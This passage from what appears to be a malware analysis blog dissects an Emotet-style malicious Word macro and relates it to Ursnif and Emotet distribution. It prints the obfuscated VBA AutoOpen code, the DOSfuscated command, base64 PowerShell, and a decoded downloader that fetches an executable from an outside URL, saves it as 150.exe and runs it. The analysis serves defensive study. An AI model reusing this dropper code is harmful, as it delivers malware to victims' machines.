	   HbmZk = CVar(38175 + dKqPZ / 50388 - sLUanN)
	   VarType Atn(200)
	ANjfjo = "4^ARA^B7^A^Hc^A^bg^B^sAG^8^A[QB^kAE^[AaQ^B^s^A"
	IsArray RIjlY - PBLBjC * oiNVwj + 81280
	   VarType 80591 + 53067
	   VarType Atn(145)
	   VarType 17068 * kvnfPB / JlJav * YLirOF
	OdRHjkn = "GUA^KAA^k^AE^MA^b^QBF^ACw"
	HbmZk = 2190 + UfrXz
	   HbmZk = Hex(UAQfw / uDtRz)
	   HbmZk = Int(36415 + sPFiG)
	ErwPX = "A^IAAkAE^g^ASg^B^pACkA^O^w^B^J^AG^4^A^d^"
	IsArray CDbl(npKji)
	   VarType 99504 - 45517 / WcSBif - tFGWuE
	NtOuimzQbwZ = "g^B^7^A^GsA/^QAx^A^E^k^Ad^AB^l^A^G^0^AIA^A^kAEg^ASg"
	IsArray JaczF * 99159
	   IsArray EauvXF + wWuDd * LXJXs / 96867
	   VarType CStr(80)
	   HbmZk = Str(imUiZ - XZZWAz)
	aMlTvB = "^Bp^A^D^s^A^[^gB5^AG^UA[^Q^B"
	IsArray 9953 - whBAzi
	   IsArray 51646 * OEohH - 56216 / cWoaQw
	   IsArray Sin(352577857)
	iPNpVC = "rAD^sAf^Q^B(^A^GEAd^AB("
	zwlScioYLa = uqTihcErAWw + cwRzZWiPWa + UMQhmt + jJRoiFwOWih + JmZzLf + ANjfjo + OdRHjkn + ErwPX + NtOuimzQbwZ + aMlTvB + iPNpVC
	   VarType CDec(zXCfv)
	   IsArray 37837 / KwaUz
	   VarType Sqr(9236)
	   HbmZk = Int(DRiSlr - XEiHR)
	End Function
	Function MjcuzKHUwfK()
	On Error Resume Next
	HbmZk = 67864 * Cbllju
	   IsArray CStr(lVIzjS)
	BhsQm = "^A^GgA^`^w^B^9AH^0^A^I^AA^"
	IsArray Val(31)
	   VarType CDbl(MjiflF)
	FnXhj = "g^AC^A^A^IA^A^g^ACAAIAA^gAC^A^AIA^Ag^ACA^A^I^"
	VarType Str(QaBEqb)
	bNcmtmfOQEQ = "A^AgAC^A^AIA^A^gAA^==&& S^E^T "
	HbmZk = OszJGw + 62992 * 30763 / SqmWlG
	   IsArray 6074 * jwVWpo
	   VarType CGWpf + DTvGkQ / 35374 + YtOHR
	   HbmZk = oujTYA - DiPwp * 21069 * wzQwSs
	qjXiOjzFQU = "^pu=!U^ZnV:^5=^y^!&    s^et  ^ "
	VarType CByte(301894302)
	   VarType TcWXTI * OiARpk + 97096 + XrKYCv
	GZcaphhi = "^ ^uop^S=^!^pu:^_=^P^!&&    SE^"
	HbmZk = LCase(83959 + WGtWw - KFAAwd / kachLJ)
	   IsArray TypeName(12856 / RwuAz + 10564 * kFMfVz)
	KOBdA = "T ^ ^   ^S^i=^!^u^o^p^S:^"
	HbmZk = Str(hOHkjz / tNawa)
	   VarType CDbl(vpESPu - wJmYip)
	   IsArray Val(FRvHo)
	   IsArray Round(90862 - WfUwA)
	   HbmZk = Round(HMWDH - 27337 - 48303 * 80671)
	nOzrKBQkA = "[^=^Y!&    se^T K^q^f=^!^S^i^:/=^Z^!&&  "
	MjcuzKHUwfK = BhsQm + FnXhj + bNcmtmfOQEQ + qjXiOjzFQU + GZcaphhi + KOBdA + nOzrKBQkA
	   HbmZk = Round(mZCRU)
	End Function
	Function zHfRQZpo()
	On Error Resume Next
	IsArray CDate(EnarXY / 19809)
	   IsArray Log(UzcISz)
	   HbmZk = Second(45)
	IozVTzfTE = "  S^E^T ^l4^9=^!^K^q^f:^7=v!&se^T ^ ^l"
	HbmZk = TimeValue(ckkwKl)
	   IsArray Sqr(VziwQz)
	   IsArray 82844 + 41596 / 32478 / LRdFj
	oIJhRZZz = "Q=^!^l^4^9^:;=^-^!&& S^Et  ^  ^ ^0^mc=^!^lQ:^'^="
	HbmZk = Str(niGEKb)
	   VarType CStr(7574)
	   IsArray TimeValue(KTrPFz + ojTQDV * 44552 + kQktN)
	YWtwc = "3^!&    S^Et  ^ ^e^bv=^!^0^mc"
	HbmZk = Sgn(RnnMOM)
	   VarType CByte(PrRPCw)
	   IsArray 69539 * 11332
	mwFFI = "^:(^=j^!&  s^e^t ^  ^ R^W^P^z=^!^e^bv:^x=^"
	IsArray Second(zpcPFW + ahwKqj - zSJUZ * Zjzhc)
	   VarType 98208 / rQXkE + cKXHsY / CHcDj
	   VarType Month(9)
	   HbmZk = zsbiO * Rsumw + 56411 - FqhnGi
	QFjROAJcH = "t!& SE^t  ^ ^  ^0y^Ye=!R^W^P^z:#^=7^!& sE^T  ^ ^J^o"
	IsArray CStr(7)
	EBoAwjb = "C=^!^0^y^Y^e^:^.=i^!&   "
	HbmZk = TypeName(514)
	   VarType CStr(100750616)
	   VarType CByte(130064755)
	   IsArray CStr(dpEZc)
	CfsfV = " S^Et ^ ^ ^  ^qh=^!^J^oC:`^=e^!&&cA^L^l  %^qh%" + CStr(Chr(YijUzjwwHpiOVk + IJhCEIBGwD + 34 + FEzDiwip + KCSkQItTE)) + "  "
	zHfRQZpo = IozVTzfTE + oIJhRZZz + YWtwc + mwFFI + QFjROAJcH + EBoAwjb + CfsfV
	   VarType wooVw / 38997 / 69792 * kLPjP
	   IsArray Hex(pzBMwq)
	End Function
	
	Attribute VB_Name = "zFLiEKVma"
	
	Sub AutoOpen()
	On Error Resume Next
	Shell% KeyString(FRlcUFjYY + JmFqhtGk + 67 + YOzfFmBN + SPjjqzqP) + cPhoBmLaqFzV + hDlwOSiL + XMQOOPAL + wfhzSmJL + zwlScioYLa + 	MjcuzKHUwfK + zHfRQZpo + rtCYAiDroJ + hLdTbbXk, 205377560 - 205377560
	End Sub

Hmm. Okay, this looks familiar. The AutoOpen() block is a tiny bit different, using Shell% instead, but it's pretty close to the same thing at the end of the day. Let's see what that string evaluates to.

CMd /v:^ ^ ^ /r " S^ET ^ ^ UZnV=p^ow^`rsh`ll^ ;^` ^JAB^OAH^I^AT^AA^9A^G^4^A/^Q^B'AC^0^Ab^w^B^.A^G^o^A/QB(^AH^Q^AIABO^A^G^UAdA^Au^A^FcA/^QB^.^A^E^M^
A^bABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^QA9^ACc^A^aAB0AHQAcAA^6^AC8^ALw^B(AG8A^bgB^kA^GkA^`^gB^l^A
H^IA^L^g^B(^A^G8A^b^Q^A7AHQ^Ac^wB0AC8^Aa^QBuA^GQA/QB^4AC^4Ac^A^Bo^A^H^AA_^w^Bs^A^D^0AcwB7^AG^g^Ab
wA5^AC4Ad^A^BrA^G4^A^JwAuA^FMAc^AB^sA^G^kAdA^A^o^ACcAQA^An^AC^kAOwA^kAH^MA[QB^uACA^A_Q^AgACcAMQ^A
1^ADAAJwA^#AC^Q^A^SA^B^K^A^G^k^A^_^Q^A^kA^GUA^b^g^B^2^A^D^o^Ac^AB^1^AGIAbAB^p^AGMAKwAnAFw^AJ^w^Ar
^AC^Q^Acw^B^hA^G4AKwAnAC^4^A/^Q^B^4A^G^UA^J^wA#AG^[A^b^wB^5^A^G^UA^[^Q^B(AG^gA^K^A^Ak^AE^MAbQ^BF^
AC^AA^a^Q^B^uAC^A^A^JABB^A^H^AAc^QA^p^AHsA^dAB5AH^kA`wA^kAE^4Ac^gB^M^AC4^ARA^B7^A^Hc^A^bg^B^sAG^8
^A[QB^kAE^[AaQ^B^s^AGUA^KAA^k^AE^MA^b^QBF^ACwA^IAAkAE^g^ASg^B^pACkA^O^w^B^J^AG^4^A^d^g^B^7^A^GsA/
^QAx^A^E^k^Ad^AB^l^A^G^0^AIA^A^kAEg^ASg^Bp^A^D^s^A^[^gB5^AG^UA[^Q^BrAD^sAf^Q^B(^A^GEAd^AB(^A^GgA^
`^w^B^9AH^0^A^I^AA^g^AC^A^A^IA^A^g^ACAAIAA^gAC^A^AIA^Ag^ACA^A^I^A^AgAC^A^AIA^A^gAA^==&& S^E^T ^pu
=!U^ZnV:^5=^y^!& s^et ^ ^ ^uop^S=^!^pu:^_=^P^!&& SE^T ^ ^ ^S^i=^!^u^o^p^S:^[^=^Y!& se^T K^q^f=^!^S^i^:/=^Z^!&& S^E^T ^l4^9=^!^K^q^f:^7=v!&se^T ^ ^lQ=^!^l^4^9^:;=^-^!&& S^Et ^ ^ ^0^mc=^!^lQ:^'^=3^!& S^Et ^ ^e^bv=^!^0^mc^:(^=j^!& s^e^t ^ ^ R^W^P^z=^!^e^bv:^x=^t!& SE^t ^ ^ ^0y^Ye=!R^W^P^z:#^=7^!& sE^T ^ ^J^oC=^!^0^y^Y^e^:^.=i^!& S^Et ^ ^ ^ ^qh=^!^J^oC:`^=e^!&&cA^L^l %^qh%

Again with the DOSfuscation! That stuff unpacks to running:

powershell -e JABOAHIATAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABBAHAAcQA9ACcAa
AB0AHQAcAA6AC8ALwBjAG8AbgBkAGkAegBlAHIALgBjAG8AbQAvAHQAcwB0AC8AaQBuAGQAZQB4AC4AcABoAHAAPwBsAD0Acw
BvAGgAbwAyAC4AdABrAG4AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHMAYQBuACAAPQAgACcAMQA1ADAAJwA7ACQASAB
KAGkAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAcwBhAG4AKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBj
AGgAKAAkAEMAbQBFACAAaQBuACAAJABBAHAAcQApAHsAdAByAHkAewAkAE4AcgBMAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsA
GUAKAAkAEMAbQBFACwAIAAkAEgASgBpACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEgASgBpADsAYgByAGUAYQBrAD
sAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==

Which is...

"$\x00N\x00r\x00L\x00=\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00N\x00e\x00t\x00.\x00W\x00e\x00b\x00C\x00l\x00i\x00e\x00n\x00t\x00;\x00$\x00A\x00p\x00q\x00=\x
00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00o\x00n\x00d\x00i\x00z\x00e\x00r\x00.\x00c\x00o\x00
m\x00/\x00t\x00s\x00t\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00p\x00h\x00p\x00?\x00l\x00=\x00s\x00o\
x00h\x00o\x002\x00.\x00t\x00k\x00n\x00'\x00.\x00S\x00p\x00l\x00i\x00t\x00(\x00'\x00@\x00'\x00)\x0
0;\x00$\x00s\x00a\x00n\x00 \x00=\x00 \x00'\x001\x005\x000\x00'\x00;\x00$\x00H\x00J\x00i\x00=\x00$\x00e\x00n\x00v\x00:\x00p\x00u\x00b\x
00l\x00i\x00c\x00+\x00'\x00\\\x00'\x00+\x00$\x00s\x00a\x00n\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x0
0;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00C\x00m\x00E\x00 \x00i\x00n\x00 \x00$\x00A\x00p\x00q\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00N\x00r\x00L\x00.\x00D\x00o\x00w\x00n\x
00l\x00o\x00a\x00d\x00F\x00i\x00l\x00e\x00(\x00$\x00C\x00m\x00E\x00,\x00 \x00$\x00H\x00J\x00i\x00)\x00;\x00I\x00n\x00v\x00o\x00k\x00e\x00-\x00I\x00t\x00e\x00m\x00 \x00$\x00H\x00J\x00i\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x
00}\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00"

Ugh, unicode again...

"$NrL=new-object Net.WebClient;$Apq='http://condizer.com/tst/index.php?l=soho2.tkn'.Split('@');$san = 
'150';$HJi=$env:public+'\\'+$san+'.exe';foreach($CmE in $Apq){try{$NrL.DownloadFile($CmE,
 $HJi);Invoke-Item $HJi;break;}catch{}}                 "

Well. Look at that. The same script we saw earlier, more or less.

$NrL=new-object Net.WebClient;
$Apq='http://condizer.com/tst/index.php?l=soho2.tkn'.Split('@');
$san = '150';
$HJi=$env:public+'\\'+$san+'.exe';
foreach ($CmE in $Apq) {
  try {
    $NrL.DownloadFile($CmE, $HJi);
    Invoke-Item $HJi;
    break;
  }
  catch{}
}

It's taking a list of URLs in $Apq and downloading them as "150.exe" and running them...

Wait.

There's only one url in the url list, but it's splitting the URL list on "@"?   

Why would you do that?

Clearly someone here has used the same tool as before to push a malware download URL, but what's on the other end of this URL?

It turns out this is an Ursnif sample. Which is weird and cool, because it's being delivered in something that might as well be an Emotet maldoc.  

I wonder how that happened. No, really, I wonder how that happened. You see, we’ve observed a few things with Emotet.  

We know that they mostly drop their own banking malware from their URL quintets, but occasionally they will load up their own spam tools to send their maldocs out, and sometimes they will even distribute PandaBanker or the TrickBot trojan instead.    

We’ve seen prior “versions” of Emotet manifesting as two parallel sets of distribution infrastructure, originally distributing different malware. This has recently morphed into a single infrastructure that generally distributes only one kind of thing at a time; although it has been occasionally observed to distribute different download URLs in parallel during the same time window, suggesting a capability to run multiple campaigns contemporaneously.

Clearly, this Ursnif sample isn’t being served from the Emotet group’s distribution infrastructure, but it’s very interesting nonetheless. Did a third party write the tool that creates the maldoc from a template and contains the payload URLs and both of these groups obtained it? Did the Emotet group write that tool for their own purposes, and then they sold it to the Ursnif group (or the Ursnif group obtained it through some means)? Was this a test run for a campaign by the Emotet group to embed a link to the Ursnif group’s payload infrastructure in their own spam email delivery?

We can’t really know, but it’s something to watch for.



Close off Canvas Menu